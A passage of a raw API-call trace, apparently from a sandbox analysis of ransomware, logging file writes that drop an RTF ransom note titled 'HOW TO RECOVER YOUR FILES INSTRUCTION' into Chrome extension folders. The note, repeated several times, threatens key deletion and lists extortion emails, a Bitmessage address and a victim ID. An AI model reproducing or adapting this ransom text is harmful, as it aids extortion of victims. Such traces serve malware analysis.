k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.582] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.582] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.582] CloseHandle (hObject=0x2f0) returned 1 [0286.582] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\#readme_eman#.rtf")) returned 0xffffffff [0286.583] GetLastError () returned 0x2 [0286.583] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n 